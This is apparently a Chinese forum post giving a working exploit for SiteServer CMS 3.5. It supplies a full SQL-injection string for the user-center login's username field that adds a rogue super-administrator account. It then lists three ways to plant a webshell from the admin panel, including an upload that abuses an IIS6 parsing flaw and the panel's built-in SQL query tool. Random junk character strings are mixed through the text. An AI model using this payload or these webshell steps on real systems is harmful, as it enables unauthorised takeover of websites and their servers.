经测试秒杀最新的3.5版0 F( E, g+ _- W$ [: ^9 T- j
7 P* w2 ]& ~7 E$ O- U+ I! e; w. S! fstieserver官网:www.siteserver.cn
" O; @1 _9 w1 w9 e% Y, S# v- n
5 X: y; g' {8 C7 c. f" X5 f % L, O" U+ \% q6 J" l
+ w) S* h) O0 B3 z# H
EXP:0 e3 f! j o, c1 o+ V% Q. Q3 W% C
( q6 a' R1 b; v0 Q
直接访问UserCenter/login.aspx
" S1 N* r* L) Q( a
# m2 a! S# E" n# ~7 i
: }" c/ ?5 i/ j8 t- [7 m5 F, h5 [1 q7 J9 s2 B
用户名处输入:
2 y) o. N' E& a& F, y t
- ?, Q P" k b/ j* D) v: p123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--& } E9 o% ~9 L1 p6 @% r* Y/ G
3 A# w$ | X j5 q : e n& f1 R5 I! a9 A
?% T' H" ~, W( _- U9 n1 A
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。$ H9 q b9 }5 T# U* p9 d0 W
5 o" G$ O4 S' e' l
7 o9 S1 m8 u# `: V$ }# g9 M: x- _, ^, W; k* }
之后再访问后台SiteServer/login.aspx用插入的用户登陆+ J8 m/ f4 u# t& B0 b
. e9 {% g) u! m8 ?5 c' b
: N" v+ B" a3 j* G% p
5 ~5 U ]0 q8 q) V9 S
后台拿webshell的三种方法:( D$ Q9 y% ?7 @; Z& z" Z
% w( Z; x9 @9 W9 @- g一、
9 ]' P) ? r. r5 i; U5 J, O( V$ }2 {7 Y0 D
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
& H \- g. F a0 W! y) Y
! |7 m! \7 m( @' ]" E+ P5 d9 X7 G2 T二、
j* s$ |3 J& E, ]: ]* v8 g! x( b, F6 U3 V" t0 p
成员权限-》添加用户-》用户名为:1.asp
) p) L2 Z* w: ?; i/ |% H! V: \ [0 F5 t
http://127.0.0.1/usercenter/
J" t' U$ a K# ~, Q2 B. |! U3 ~
+ c) h9 ]0 @$ Y/ n用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
' L( M$ d( L/ S+ T6 D
# v1 u/ I3 i. _, Q% g* B& N(ps:后台添加用户时不会验证是否含有非法字符)
% g6 S) e8 q. ]/ I& m
' u, T) S) [( v: ^三、
: E, U e" ^! p6 S: v# c
* N: {: g [2 {系统工具-》实用工具-》机器参数查看
& m/ h- a4 g$ j可以看到数据库类型、名称,WEB路径( W! ^4 b) i) f; u& _1 t3 y( r9 Q% v
2 U7 e- f2 k- r( R7 S系统工具-》数据库工具-》SQL语句查询
# F0 X% Q: W7 n5 @: X这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。; C; k6 k! S% p" I
. R1 ^5 T& L+ w! t- Q |